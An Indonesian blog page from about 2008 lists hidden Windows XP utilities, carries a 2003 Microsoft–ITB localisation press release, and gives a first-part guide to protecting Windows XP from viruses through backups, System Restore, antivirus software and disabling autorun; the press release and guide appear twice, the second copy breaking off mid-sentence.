1613clicks
25 Aplikasi Tersembunyi Windows XP
sanfucius
Kamis, 26 Juni 2008, 00:01
Di bawah ini adalah 25 dari aplikasi yang datang dengan Windows XP yang banyak terlupakan. Tergantung dari pemakaian komputer Anda, beberapa dari aplikasi di bawah ini mungkin berguna, ada juga beberapa program peninggalan Windows versi lama yang tidak dihapus, apabila Anda ingin bernostalgia. Untuk menjalankan program-program di bawah ini, cukup buka command prompt dan ketik nama programnya (dengan extensi .exe).
Character Map = charmap.exe (berguna untuk mencari karakter yang tidak umum)
Disk Cleanup = cleanmgr.exe
Clipboard Viewer = clipbrd.exe (melihat konten dari Windows clipboard)
Dr Watson = drwtsn32.exe (Troubleshooting tool)
DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
Private character editor = eudcedit.exe ( memungkinkan kreasi atau modifikasi karakter)
IExpress Wizard = iexpress.exe (Membuat self-extracting / self-installing package)
Microsoft Synchronization Manager = mobsync.exe
Windows Media Player 5.1 = mplay32.exe (Retro version dari Media Player, very basic).
ODBC Data Source Administrator = odbcad32.exe
Object Packager = packager.exe
System Monitor = perfmon.exe (sangat berguna, alat yang sangat dapat dikonfigurasi, ia dapat memberitahu anda segala sesuatu yang ingin anda ketahui mengenai kinerja PC)
Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
Remote Access phone book = rasphone.exe
Registry Editor = regedt32.exe [also regedit.exe] (untuk hacking Windows Registry).
Network shared folder wizard = shrpubw.exe (menciptakan shared folders pada network).
File signature verification tool = sigverif.exe
Volume Control = sndvol32.exe
System Configuration Editor = sysedit.exe (modify System.ini & Win.ini seperti pada Win98! ).
Syskey = syskey.exe
Microsoft Telnet Client = telnet.exe
Driver Verifier Manager = verifier.exe
Windows for Workgroups Chat = winchat.exe
System configuration = msconfig.exe (dapat digunakan untuk mengontrol program startup)
gpedit.msc digunakan untuk mengatur group policy dan otorisasi, apabila Anda menggunakan Active Directory. Klik di sini untuk sumber artikel.
Minggu, 21 Desember 2008
TIP DAN TRIK
Microsoft Tunjuk Institut Teknologi Bandung untuk mengembangkan Windows XP dan Office 2003 versi Bahasa Indonesia
usdiRabu, 27 - Agustus - 2003, 12:23:41
Bandung, 26 Agustus 2003 – Hari ini bertepatan dengan acara Sarasehan BHTV 2003 di Aula Barat kampus Institut Teknologi Bandung (ITB), Microsoft bersama dengan ITB menandatangani kerjasama untuk mengembangkan produk unggulan Microsoft yaitu Windows XP dan Office 2003 versi Bahasa Indonesia. Adapun proses awal dari kerjasama ini mencakup penterjemahan istilah-istilah teknik ke dalam Bahasa Indonesia, yang akan menjadi istilah baku setelah melalui konsultasi dengan lembaga pengakajian bahasa yang berwenang.Penandatanganan yang disaksikan oleh I Gusti Putu Suryawirawan, Direktur Industri Teknologi Informasi dan Elektronika dan Aswin Sasongko, Sekretaris Kementrian Riset dan Teknologi, Republik Indonesia merupakan suatu kerjasama pertama antara institusi pendidikan lokal di Indonesia dengan sebuah perusahaan teknologi informasi kelas dunia seperti Microsoft dalam mengembangkan produk piranti lunak berbahasa Indonesia.Ari Kunwidodo, Wakil Presiden Direktur PT Microsoft Indonesia yang mewakili Microsoft Corporation selaku pemilik Hak Atas Kekayaan Intelektual produk Windows XP dan Office 2003, menggarisbawahi bahwa kerjasama ini merupakan kerjasama yang strategis dalam mengurangi kesenjangan digital di Indonesia dan untuk lebih memasyarakatkan produk Microsoft bagi pengguna di Indonesia. “Pengembangan istilah teknik Bahasa Indonesia dalam produk kami merupakan suatu bentuk komitmen Microsoft untuk mengurangi kesenjangan digital di negera-negara berkembang seperti Indonesia. Agar lebih banyak masyarakat Indonesia yang mendapatkan manfaat dari penggunaan produk Microsoft,” ujar Ari. Microsoft menunjuk ITB sebagai mitra dalam proyek ini karena ITB dinilai sebagai suatu perguruan tinggi di Indonesia yang telah memiliki pengalaman luas dalam pengembangan piranti lunak. Sedangkan bagi ITB sendiri kerjasama ini merupakan wujud nyata untuk mengembangkan dunia Informasi dan Teknologi di Indonesia. Hal ini diungkapkan oleh Budi Rahardjo, Direktur PPP ITI LPPM – ITB. “Kepercayaan Microsoft sebagai pemain IT dunia kepada ITB sebagai salah satu perguruan tinggi di Indonesia merupakan suatu komitmen bersama untuk mengembangkan Informasi dan Teknologi di Indonesia.” demikian dikatakan oleh Budi Rahardjo.Dalam perencanaannya, kedua belah pihak melihat kemungkinan produk Microsoft Windows XP versi Bahasa Indonesia akan tersedia menjelang akhir tahun 2003 ini, dan akan dilanjutkan dengan proyek berikutnya, yaitu penterjemahan istilah-istilah teknik yang ada dalam produk aplikasi Microsoft Office 2003 yang mana versi Bahasa Inggrisnya akan diluncurkan pada akhir tahun ini.
usdiRabu, 27 - Agustus - 2003, 12:23:41
Bandung, 26 Agustus 2003 – Hari ini bertepatan dengan acara Sarasehan BHTV 2003 di Aula Barat kampus Institut Teknologi Bandung (ITB), Microsoft bersama dengan ITB menandatangani kerjasama untuk mengembangkan produk unggulan Microsoft yaitu Windows XP dan Office 2003 versi Bahasa Indonesia. Adapun proses awal dari kerjasama ini mencakup penterjemahan istilah-istilah teknik ke dalam Bahasa Indonesia, yang akan menjadi istilah baku setelah melalui konsultasi dengan lembaga pengakajian bahasa yang berwenang.Penandatanganan yang disaksikan oleh I Gusti Putu Suryawirawan, Direktur Industri Teknologi Informasi dan Elektronika dan Aswin Sasongko, Sekretaris Kementrian Riset dan Teknologi, Republik Indonesia merupakan suatu kerjasama pertama antara institusi pendidikan lokal di Indonesia dengan sebuah perusahaan teknologi informasi kelas dunia seperti Microsoft dalam mengembangkan produk piranti lunak berbahasa Indonesia.Ari Kunwidodo, Wakil Presiden Direktur PT Microsoft Indonesia yang mewakili Microsoft Corporation selaku pemilik Hak Atas Kekayaan Intelektual produk Windows XP dan Office 2003, menggarisbawahi bahwa kerjasama ini merupakan kerjasama yang strategis dalam mengurangi kesenjangan digital di Indonesia dan untuk lebih memasyarakatkan produk Microsoft bagi pengguna di Indonesia. “Pengembangan istilah teknik Bahasa Indonesia dalam produk kami merupakan suatu bentuk komitmen Microsoft untuk mengurangi kesenjangan digital di negera-negara berkembang seperti Indonesia. Agar lebih banyak masyarakat Indonesia yang mendapatkan manfaat dari penggunaan produk Microsoft,” ujar Ari. Microsoft menunjuk ITB sebagai mitra dalam proyek ini karena ITB dinilai sebagai suatu perguruan tinggi di Indonesia yang telah memiliki pengalaman luas dalam pengembangan piranti lunak. Sedangkan bagi ITB sendiri kerjasama ini merupakan wujud nyata untuk mengembangkan dunia Informasi dan Teknologi di Indonesia. Hal ini diungkapkan oleh Budi Rahardjo, Direktur PPP ITI LPPM – ITB. “Kepercayaan Microsoft sebagai pemain IT dunia kepada ITB sebagai salah satu perguruan tinggi di Indonesia merupakan suatu komitmen bersama untuk mengembangkan Informasi dan Teknologi di Indonesia.” demikian dikatakan oleh Budi Rahardjo.Dalam perencanaannya, kedua belah pihak melihat kemungkinan produk Microsoft Windows XP versi Bahasa Indonesia akan tersedia menjelang akhir tahun 2003 ini, dan akan dilanjutkan dengan proyek berikutnya, yaitu penterjemahan istilah-istilah teknik yang ada dalam produk aplikasi Microsoft Office 2003 yang mana versi Bahasa Inggrisnya akan diluncurkan pada akhir tahun ini.
KOMPUTERKU KENA VIRUS
Komputer bebas virus (99,99%)! (part 1)
Banyak orang mungkin berharap agar komputernya bebas dari virus komputer untuk selamanya. Gak salah sih, tapi itu bisa diibaratkan hidup tanpa kesedihan, suatu utopia. Well, the fact is, sometimes life can really sucks, begitu juga dengan komputer. Apa yang ingin saya sampaikan disini hanyalah cara-cara dasar untuk melindungi komputer Anda dari serangan virus komputer. Adapun penjelasan ini disusun dengan menggunakan acuan sistem operasi Microsoft Windows XP (untuk versi windows lain mungkin akan menyusul di waktu mendatang jika memang dirasa perlu).Langkah-langkah yang akan saya sampaikan disini akan saya bagi menjadi beberapa bagian. Bagian pertama (yaitu bagian ini) akan menjelaskan mengenai langkah-langkah pencegahan agar virus tidak dapat/sulit untuk menginfeksi komputer Anda. Bagian kedua akan menjelaskan mengenai cara mengatasi virus jika komputer Anda sudah terinfeksi, termasuk menggunakan beberapa tools yang bisa membantu. Bagian ketiga merupakan afterplay, setelah virus berhasil dihilangkan apa saja langkah yang harus dilakukan untuk proses recovery.Ok, mari kita bahas mengenai langkah-langkah pencegahan agar komputer Anda tidak (mudah) terinfeksi virus komputer. Dalam penjelasan mengenai langkah pencegahan ini juga akan dipergunakan beberapa tools (dan cara penggunaannya) yang saya harap bisa membantu Anda.1. Backup registry komputer AndaBiasanya langkah ini saya lakukan saat komputer baru pertama kali diinstal (atau saat komputer masih bersih dari virus). Langkah melakukan backup registry komputer dapat Anda lakukan menggunakan perintah 'regedit' (export registry) atau menggunakan system restore. Tutorial cara melakukan backup registry pada sistem operasi komputer Anda dapat Anda lihat disini.Jika Anda melakukan export registry sistem operasi Anda, simpan file berharga tersebut :) Karena ukurannya yang biasanya besar (bermega-mega byte) maka saya biasanya melakukan kompresi terhadap file tersebut menggunakan winrar atau program archiver yang lain (misalnya 7zip, winzip, dll). Namun cara backup registr dengan melakukan "export registry" ini tidak sempurna dan bersih. Untuk pengguna Windows XP, fungsi "System Restore" bisa menangani backup untuk registry sistem operasi Anda dengan lebih baik. Selain menggunakan system restore, Microsoft juga menyediakan sebuah program yang dapat menuntun Anda melakukan backup terhadap registri.2. Aktifkan system restore komputer AndaSystem restore merupakan komponen yang penting untuk mengatasi masalah sistem pada sistem operasi Anda. Hal ini juga bisa berlaku jika komputer Anda terinfeksi virus, karena umumnya sistem komputer Anda akan "diutak-atik" oleh virus. Nah, salah satu cara untuk mengembalikan keadaan sistem Anda seperti sebelum terkena virus adalah dengan menggunakan program/tools system restore yang disediakan oleh Windows XP. Secara default/standard System Restore akan menyala pada Windows XP, untuk mengetahui apakah System Restore berjalan bisa dilihat melalui Control Panel > Systems > Tab System Restore. Di jendela System Restore ini, Anda dapat mengatur drive apa saja yang akan dimonitor oleh System Restore, atau jika Anda ingin mematikan System Restore bisa melalui jendela ini.Adapun cara menggunakan system restore ini dapat dilihat disini.Semakin sering Anda membuat restore point (misalnya tiap hari), semakin mudah Anda melakukan pemulihan jika komputer Anda terinfeksi virus. Untuk restore point yang sudah lebih dari beberapa bulan, tentu saja bisa Anda buang/hapus untuk optimasi, karena restore point yang telah lalu dan tidak dipakai lagi hanya akan menghabiskan tempat di hardisk Anda.3. Pisahkan data/dokumen Anda dari sistem operasiSalah satu saran lain yang biasanya saya berikan pada para pengguna komputer adalah untuk memisahkan data/dokumen dengan partisi/drive tempat sistem operasi berada (misal: sistem operasi windows xp ada pada drive/partisi C, maka pisahkan data ke partisi/drive lain misalnya drive D). Memang dengan melakukan hal ini tidak menjamin bahwa komputer Anda bebas serangan virus, namun dengan memisahkan data pada partisi/drive lain, maka jika Anda harus melakukan proses perbaikan (atau bahkan format) pada sistem operasi komputer Anda, maka Anda tak perlu repot untuk memindahkan/menyelamatkan data Anda terlebih dahulu sebelum proses perbaikan sistem operasi dilakukan. Apalagi jika partisi/drive tempat Windows Anda harus diformat, maka Anda tak akan repot untuk memindahkan datanya terlebih dahulu. Berikut adalah tutorial sederhana bagaimana Anda dapat memindahkan lokasi "My Documents" dari tempat/lokasi asalnya ke tempat lain.1) Buka Windows Explorer Anda2) Klik kanan folder "My Documents"3) Pilih menu Properties4) Pada tab Target bagian "Target folder location" tertulis lokasi sebenarnya folder "My Documents" di komputer Anda (secara default berada di "$\Documents and Settings\$NamaUser\My Documents")5) Pilih tombol "Move"6) Pilih lokasi baru tujuan folder "My Documents" Anda, kemudian tekan tombol OK7) Bagian "Target" akan berubah sesuai lokasi baru pilihan Anda, tekan tombol OK jika sudah selesai (data dan folder Anda akan dipindahkan oleh Windows dari lokasi lama ke lokasi baru). Jika ingin mengembalikan ke tempat semula silahkan tekan tombol "Restore Default".Dan tutorial untuk melakukan partisi terhadap hard disk Anda menggunakan tools Partition Magic untuk melakukan partisi terhadap hard disk Anda dapat dilihat disini4. Backup data Anda secara rutinMelakukan backup data bisa sangat membantu Anda jika akhirnya komputer Anda terkena virus. Proses backup data ini tidak selalu berarti bahwa Anda harus melakukan proses copy file-file Anda setiap hari, karena Microsoft Windows sendiri sudah menyediakan sebuah program untuk melakukan backup data. Pada Windows XP, Anda dapat mengakses program backup ini melalui Start Menu > All Programs > Accessories > System Tools > Backup. Saat Anda menjalankan program ini, secara default Anda akan dibantu langkah demi langkah untuk melakukan backup dari data Anda (wizard), namun jika yang muncul adalah pengaturan "Advanced Mode", Anda bisa mengaktifkan "Wizard Mode" dari tab "Welcome" dengan memilih menu "Wizard Mode". Adapun cara melakukan backup menggunakan tools ini (sederhana) adalah sebagai berikut:1) Buka Backup Utilities dari Start Menu2) Pilih "Next" akan menampilkan pilihan menu untuk melakukan backup atau restore data, pilih "Backup files and settings"3) Pilih "Next" dan tentukan apa saja yang akan Anda backup3)a. My documents and settings: Hanya dokumen Anda saja3)b. Everyone's documents and settings: Melakukan backup dokumen semua user pada komputer Anda3)c. All information on this computer: Melakukan backup semua data di komputer, kemudian membuat recovery disk untuk melakukan restore terhadap Windows3)d. Let me choose what to backup: Anda bisa menentukan sendiri apa saja yang akan Anda backup4) Jika Anda memilih poin 3.a-3.c ketika Anda menekan tombol "Next", akan tampil jendela untuk memilih media untuk menyimpan hasil backup dan nama backup yang dimaksud. Secara default adalah menggunakan floppy disk (wew...jadul banget yah...), namun Anda bisa juga melakukan browse dan memilih suatu tempat di hardisk Anda, untuk kemudian nanti di-burn ke CD/DVD. Jika Anda memilih poin 3.d. maka Anda harus memilih folder/file apa saja yang akan dibackup kemudian setelah memilih "Next", baru jendela untuk memilih tempat hasil backup muncul.5) Pilih "Next", dan ditampilkan jendela informasi backup Anda.6) Pilih "Finish", dan Windows akan melakukan backup.7) Pilih "Close" untuk menutup jendela, pilih "Report" untuk melihat laporan proses backup.Untuk melakukan restore data yang sudah dibackup, gunakan cara berikut:1) Buka Backup Utilities dari Start Menu2) Pilih "Next" akan menampilkan pilihan menu untuk melakukan backup atau restore data, pilih "Restore files and settings"3) Pilih "Next" dan tentukan file yang akan Anda restore beserta tempat awal file hasil restore, jika file backup yang dimaksud tidak ada di pilihan, silahkan tekan tombol "Browse" untuk mencari file backup yang dimaksud.4) Pilih "Next" akan menampilkan informasi file backup.5) Pilih "Finish" dan file hasil backup akan di-restore ke lokasi awalnya.Jika Anda masih merasa cukup repot untuk menjalankan tool backup ini, Anda dapat menjadwalkannya melalui Task Scheduler melalui Advanced Mode (begitu juga jika Anda ingin membuat restore point untuk komputer Anda). Saya tidak akan membahas penggunaan Advanced Mode disini.5. Buat image terhadap hardisk Anda (Norton Ghost)Tutorial pembuatan image dengan Norton Ghost dapat dilihat disiniTutorial untuk melakukan restore image dengan Norton Ghost dapat dilihat disini6. "Beku"kan keadaan sistem komputer Anda (Deep Freeze)Deep Freeze merupakan sebuah software keluaran Faronics yang dibuat bertujuan untukTutorial penggunaan Deep Freeze dapat dilihat disini, atau disini untuk lebih jelas (saya copas).7. Lakukan instalasi antivirusUmumnya yang menjadi pertanyaan saat kita akan menginstall antivirus adalah antivirus apa yang terbaik untuk mengatasi virus? Ini sudah menjadi satu pertanyaan klasik yang cukup sulit untuk dijawab, karena setiap hari selalu muncul virus baru, dan kehandalan dari suatu antivirus adalah mendeteksi virus baru tersebut. Ada beberapa website yang ditujukan untuk melakukan perbandingan dan pengujian antara antivirus yang ada dalam mendeteksi virus dan mengatasinya. Beberapa website tersebut diantaranya:- AV Comparatives- AV TestNah, dapat Anda lihat sendiri bukan, bahwa kriteria "terbaik" bagi antivirus yang ada adalah relatif, tergantung dari fungsi yang diujikan dan keperluan Anda. Tapi secara sederhana, saya mengasumsikan bahwa antivirus dengan hasil penilaian akhir > 95% merupakan sebuah antivirus yang baik untuk digunakan.Untuk jenis antivirusnya sendiri saya lebih memilih untuk menggunakan antivirus yang bersifat freeware, daripada harus melakukan pembajakan software dengan mencari crack dan serial. Hal ini didasari atas alasan bahwa kemampuan antivirus free yang ada saat ini tidak kalah dengan antivirus berbayar. Kalau masih ada solusi untuk menggunakan yang gratis kenapa harus mencuri sesuatu yang seharusnya dibayar? Saat artikel ini ditulis, saya juga menggunakan antivirus gratis yang dikeluarkan oleh Grisoft, yaitu AVG 8 Free edition (sudah sepaket antara anti virus dengan anti spyware) dan "menikahkan" antivirus ini dengan antivirus karya anak bangsa sendiri yaitu PC Media Anti Virus (PCMAV) khususnya untuk Real Time Protection/RTP. Merasa masih kurang, saya juga mengintegrasikan database virus dari Clam Anti Virus (ClamAV) dengan PCMAV RTP, sehingga kemampuan deteksi virus oleh PCMAV menjadi lebih lengkap, seperti slogan sebuah iklan produk wanita yang mengatakan bahwa "...perlindungan ganda sehingga tidak mudah tembus..." :p Namun harap diperhatikan juga, biasanya penggunaan antivirus akan menghabiskan memori yang cukup besar. Oleh karena itu, jika memang dirasa cukup menggunakan 1 antivirus akan lebih baik asalkan sering di-update dibandingkan menggunakan banyak antivirus sekaligus (biasanya akan memperlambat kerja komputer). Pada link posting berikut ini terdapat daftar dari antivirus yang cukup umum digunakan beserta tempat untuk mendownloadnya.8. Matikan fungsi autorun (menjalankan otomatis/automatic run) pada driveVirus Indonesia terkenal dengan sifatnya yang mudah menyebar melalui media flash disk. Biasanya eksekusi virus dilakukan melalui penambahan sebuah file "autorun.inf" pada flash disk. File "autorun.inf" ini akan otomatis dijalankan ketika Windows menjalankan fungsi autorun pada removable drive (itu loh, jendela tampilan pilihan yang berisi opsi play with media player, open folder, take no action, dll), atau ketika pengguna komputer melakukan double click pada icon removable drive/flash disk melalui jendela "My Computer". Fungsi autorun tidak berjalan jika pengguna membuka removable drive/flash disk melalui Windows Explorer melalui tampilan "Folder View" (tampilan daftar folder di sebelah kiri jendela "windows explorer" yang dapat diaktifkan dengan menekan icon bertuliskan "Folders" pada "windows explorer"), sehingga jika ada virus yang membuat file "autorun.inf" pada flash disk, file ini tidak akan dijalankan, dan file virus tidak berjalan juga. Namun tentu saja bagi pengguna komputer yang tidak mengerti akan hal ini, mereka bisa tanpa sengaja menjalankan virus melalui eksekusi file "autorun.inf". Jadi, kenapa tidak kita matikan saja fungsi autorun untuk removable drive di Windows XP? Cara untuk mematikan fungsi autorun ini dapat dilakukan dengan melakukan pengaturan policy/kebijakan pada sistem operasi Windows XP. Untuk mematikan autoplay pada semua drive bisa dilakukan dengan cara seperti ini:1) Buka Start menu, kemudian pilih menu "Run" (atau menekan tombol Windows dan r secara bersamaan), ketik gpedit.msc [enter]2) Pilih Computer Configuration > Administrative Templates > System.3) Cari opsi "Turn Off Autoplay" di jendela kanan, kemudian klik kanan dan pilih "Properties".4) Pilih "Enable", dan pada kotak isian "Turn off autoplay on", pilih "All Drive", kemudian tekan tombol "OK"9. Pengaturan tambahan tampilan Windows ExplorerPoin ini saya masukkan dalam artikel ini karena alasan sederhana, bahwa banyak virus yang menyamarkan dirinya menjadi sebuah folder, atau sebuah file dengan icon tertentu, atau menyembunyikan diri (hidden file). Oleh karena itu, pengaturan tambahan tampilan di Windows Explorer ini akan membuat Anda semakin berhati-hati agar tidak sembarangan dalam membuka suatu file. Beberapa pengaturan yang akan saya bahas di poin ini adalah mengenai pengaturan melalui Folder Option, tampilan detail Windows Explorer dan penggantian icon standar Windows.Untuk membuka menu Folder Option, Anda dapat membuka melalui Windows Explorer, kemudian memilih menu Tools > Folder Optionsa. Menampilkan ekstensi file1) Dari tampilan jendela Folder Options, buka tab View.2) Hilangkan tanda ceklist/centang dari opsi "Hide extensions for known file types".b. Menampilkan file yang tersembunyi1) Dari tampilan jendela Folder Options, buka tab View.2) Pilih opsi "Show hidden files and folders" pada bagian "Hidden files and folders".3) [optional] Untuk menampilkan file "super hidden" silahkan hilangkan tanda ceklist/centang dari opsi "Hide protected operating system files (Recommended)", maka selihai apapun suatu file menyembunyikan dirinya, pasti akan terlihat.Untuk menampilkan detail pada Windows Explorer:1) Buka jendela Windows Explorer2) Pilih menu View > DetailsKetika tampilan details dipilih, maka akan ditampilkan informasi tambahan suatu file, jadi jika ada virus yang menyamar menjadi sebuah folder, maka pada bagian type akan tertulis application dan bukan file folder.10. Gaya hidup sehatGaya hidup sehat disini bukanlah gaya hidup yang berhubungan dengan fisik atau tubuh Anda. Yang saya maksud disini adalah bagaimana sikap dan tingkah laku Anda dalam menggunakan komputer. Beberapa contoh gaya hidup sehat dalam berkomputer ini antara lain:a. Jangan mudah percayaMisalnya: jangan sembarang klik-klik application apapun KECUALI Anda tahu aplikasi itu atau kalau Anda percaya dengan pembuatnya, dan jangan penasaran dengan file-file yg namanya "menggoda". 80% PC yg kena virus disebabkan oleh user yang penasaran.b. Jangan ceroboh/tidak hati-hatiMisalnya: Mendownload attachment email dari orang yang tidak Anda kenal, tidak menggunakan antivirus pada komputer Anda, tidak melakukan update terhadap Windows (service pack), dll. Sikap ceroboh seperti yang saya sebutkan tadi mungkin saja bisa berakibat fatal bagi komputer Anda.c. Sopan santunInternet terkenal dengan sifat anonymous/tidak bernama. Seringkali karena sifatnya anonymous banyak hal bisa terjadi, misalnya: seorang dengan profil A di internet ternyata bukanlah A di dunia nyata, atau seseorang membuat profil palsu di internet untuk menipu atau merusak nama baik A di dunia nyata, atau seseorang merasa aman karena unsur anonymous tadi sehingga bersikap tidak menghargai pengguna lain di internet. Ingat, bahwa setiap tindakan kita pasti memiliki konsekuensi. Jadi sehubungan dengan UU-ITE yang berlaku di negara kita, mari kita juga berlaku sopan dalam menggunakan komputer/internet sehingga tidak ada pihak yang merasa dirugikan.d. Saling menghargaiKhususnya bagi Anda yang suka menggunakan software ilegal dan terbiasa dengan menggunakan crack,keygen, dll untuk software berbayar. Saya harap kita bisa menghargai pembuat software dengan membeli produk aslinya, bukan dengan menggunakan cara ilegal untuk mendapatkan software tersebut. Sudah menjadi suatu hal yang umum bahwa yang namanya crack atau keygen sering disusupi virus/trojan/spyware yang dapat menyerang komputer Anda saat Anda menggunakan crack tersebut. Bahkan pada saat Anda men-download crack tersebut, seringkali website tersebut dipenuhi dengan program jahat. Jadi mari kita dukung penggunaan perangkat freeware di komputer kita.Memang tidak semua gaya hidup di atas berhubungan dengan pencegahan virus untuk menginfeksi komputer Anda, namun beberapa hal di atas bisa jadi membantu Anda untuk jadi lebih berhati-hati dalam berkomputer/berinternet.Tips tambahan:1. File yang sering digunakan virus yaitu berekstensi *.exe, *.inf, *.vbs, *.dll, *.scr, *.bat (jika anda yakin, hapuslah file-file yang anda curigai sebagai virus).2. Ciri umum file asli:- jika file document word, berekstensi doc, bertipe file word documents- jika file folder, tidak mempunyai size dan bertipe file folder- dll3. Jangan login menggunakan user Administrator/yang punya hak Administrator pada komputer Anda, tapi login dengan user yang punya akses terbatas/limited access. Dengan demikian jika virus menyerang, kerusakan yang ditimbulkan bisa diminimalkan.4. http://root.wanxp.net/index.php?option=com_content&task=view&id=142&Itemid=865. http://root.wanxp.net/index.php?option=com_content&task=view&id=98&Itemid=866. Yahoo AnswerWahh.. sebenarnya masih banyak cara lain untuk mencegah virus masuk ke komputer (mengaktifkan/menginstall firewall, menggunakan sistem operasi virtual dengan VirtualPC atau VMWare, dll), tapi saya pikir beberapa cara yang sudah saya sampaikan di atas sudah cukup membantu untuk melakukan pencegahan. Tapi...jangan bersedih atau kecewa jika setelah menerapkan cara di atas komputer Anda masih terkena virus (well, too bad actually, karena masih ada peluang 0,01% untuk kena). Pada bagian selanjutnya, saya akan menjelaskan cara-cara yang umum saya lakukan ketika menangani sebuah komputer bervirus, yah sekalian juga berbagi ilmu bagaimana mereparasi komputer yang terkena virus. Semoga bagian kedua artikel ini tidak memakan waktu yang lama untuk saya susun.NB: Sebagian isi artikel ini merupakan kontribusi dari pengguna Yahoo Answer
Banyak orang mungkin berharap agar komputernya bebas dari virus komputer untuk selamanya. Gak salah sih, tapi itu bisa diibaratkan hidup tanpa kesedihan, suatu utopia. Well, the fact is, sometimes life can really sucks, begitu juga dengan komputer. Apa yang ingin saya sampaikan disini hanyalah cara-cara dasar untuk melindungi komputer Anda dari serangan virus komputer. Adapun penjelasan ini disusun dengan menggunakan acuan sistem operasi Microsoft Windows XP (untuk versi windows lain mungkin akan menyusul di waktu mendatang jika memang dirasa perlu).Langkah-langkah yang akan saya sampaikan disini akan saya bagi menjadi beberapa bagian. Bagian pertama (yaitu bagian ini) akan menjelaskan mengenai langkah-langkah pencegahan agar virus tidak dapat/sulit untuk menginfeksi komputer Anda. Bagian kedua akan menjelaskan mengenai cara mengatasi virus jika komputer Anda sudah terinfeksi, termasuk menggunakan beberapa tools yang bisa membantu. Bagian ketiga merupakan afterplay, setelah virus berhasil dihilangkan apa saja langkah yang harus dilakukan untuk proses recovery.Ok, mari kita bahas mengenai langkah-langkah pencegahan agar komputer Anda tidak (mudah) terinfeksi virus komputer. Dalam penjelasan mengenai langkah pencegahan ini juga akan dipergunakan beberapa tools (dan cara penggunaannya) yang saya harap bisa membantu Anda.1. Backup registry komputer AndaBiasanya langkah ini saya lakukan saat komputer baru pertama kali diinstal (atau saat komputer masih bersih dari virus). Langkah melakukan backup registry komputer dapat Anda lakukan menggunakan perintah 'regedit' (export registry) atau menggunakan system restore. Tutorial cara melakukan backup registry pada sistem operasi komputer Anda dapat Anda lihat disini.Jika Anda melakukan export registry sistem operasi Anda, simpan file berharga tersebut :) Karena ukurannya yang biasanya besar (bermega-mega byte) maka saya biasanya melakukan kompresi terhadap file tersebut menggunakan winrar atau program archiver yang lain (misalnya 7zip, winzip, dll). Namun cara backup registr dengan melakukan "export registry" ini tidak sempurna dan bersih. Untuk pengguna Windows XP, fungsi "System Restore" bisa menangani backup untuk registry sistem operasi Anda dengan lebih baik. Selain menggunakan system restore, Microsoft juga menyediakan sebuah program yang dapat menuntun Anda melakukan backup terhadap registri.2. Aktifkan system restore komputer AndaSystem restore merupakan komponen yang penting untuk mengatasi masalah sistem pada sistem operasi Anda. Hal ini juga bisa berlaku jika komputer Anda terinfeksi virus, karena umumnya sistem komputer Anda akan "diutak-atik" oleh virus. Nah, salah satu cara untuk mengembalikan keadaan sistem Anda seperti sebelum terkena virus adalah dengan menggunakan program/tools system restore yang disediakan oleh Windows XP. Secara default/standard System Restore akan menyala pada Windows XP, untuk mengetahui apakah System Restore berjalan bisa dilihat melalui Control Panel > Systems > Tab System Restore. Di jendela System Restore ini, Anda dapat mengatur drive apa saja yang akan dimonitor oleh System Restore, atau jika Anda ingin mematikan System Restore bisa melalui jendela ini.Adapun cara menggunakan system restore ini dapat dilihat disini.Semakin sering Anda membuat restore point (misalnya tiap hari), semakin mudah Anda melakukan pemulihan jika komputer Anda terinfeksi virus. Untuk restore point yang sudah lebih dari beberapa bulan, tentu saja bisa Anda buang/hapus untuk optimasi, karena restore point yang telah lalu dan tidak dipakai lagi hanya akan menghabiskan tempat di hardisk Anda.3. Pisahkan data/dokumen Anda dari sistem operasiSalah satu saran lain yang biasanya saya berikan pada para pengguna komputer adalah untuk memisahkan data/dokumen dengan partisi/drive tempat sistem operasi berada (misal: sistem operasi windows xp ada pada drive/partisi C, maka pisahkan data ke partisi/drive lain misalnya drive D). Memang dengan melakukan hal ini tidak menjamin bahwa komputer Anda bebas serangan virus, namun dengan memisahkan data pada partisi/drive lain, maka jika Anda harus melakukan proses perbaikan (atau bahkan format) pada sistem operasi komputer Anda, maka Anda tak perlu repot untuk memindahkan/menyelamatkan data Anda terlebih dahulu sebelum proses perbaikan sistem operasi dilakukan. Apalagi jika partisi/drive tempat Windows Anda harus diformat, maka Anda tak akan repot untuk memindahkan datanya terlebih dahulu. Berikut adalah tutorial sederhana bagaimana Anda dapat memindahkan lokasi "My Documents" dari tempat/lokasi asalnya ke tempat lain.1) Buka Windows Explorer Anda2) Klik kanan folder "My Documents"3) Pilih menu Properties4) Pada tab Target bagian "Target folder location" tertulis lokasi sebenarnya folder "My Documents" di komputer Anda (secara default berada di "$\Documents and Settings\$NamaUser\My Documents")5) Pilih tombol "Move"6) Pilih lokasi baru tujuan folder "My Documents" Anda, kemudian tekan tombol OK7) Bagian "Target" akan berubah sesuai lokasi baru pilihan Anda, tekan tombol OK jika sudah selesai (data dan folder Anda akan dipindahkan oleh Windows dari lokasi lama ke lokasi baru). Jika ingin mengembalikan ke tempat semula silahkan tekan tombol "Restore Default".Dan tutorial untuk melakukan partisi terhadap hard disk Anda menggunakan tools Partition Magic untuk melakukan partisi terhadap hard disk Anda dapat dilihat disini4. Backup data Anda secara rutinMelakukan backup data bisa sangat membantu Anda jika akhirnya komputer Anda terkena virus. Proses backup data ini tidak selalu berarti bahwa Anda harus melakukan proses copy file-file Anda setiap hari, karena Microsoft Windows sendiri sudah menyediakan sebuah program untuk melakukan backup data. Pada Windows XP, Anda dapat mengakses program backup ini melalui Start Menu > All Programs > Accessories > System Tools > Backup. Saat Anda menjalankan program ini, secara default Anda akan dibantu langkah demi langkah untuk melakukan backup dari data Anda (wizard), namun jika yang muncul adalah pengaturan "Advanced Mode", Anda bisa mengaktifkan "Wizard Mode" dari tab "Welcome" dengan memilih menu "Wizard Mode". Adapun cara melakukan backup menggunakan tools ini (sederhana) adalah sebagai berikut:1) Buka Backup Utilities dari Start Menu2) Pilih "Next" akan menampilkan pilihan menu untuk melakukan backup atau restore data, pilih "Backup files and settings"3) Pilih "Next" dan tentukan apa saja yang akan Anda backup3)a. My documents and settings: Hanya dokumen Anda saja3)b. Everyone's documents and settings: Melakukan backup dokumen semua user pada komputer Anda3)c. All information on this computer: Melakukan backup semua data di komputer, kemudian membuat recovery disk untuk melakukan restore terhadap Windows3)d. Let me choose what to backup: Anda bisa menentukan sendiri apa saja yang akan Anda backup4) Jika Anda memilih poin 3.a-3.c ketika Anda menekan tombol "Next", akan tampil jendela untuk memilih media untuk 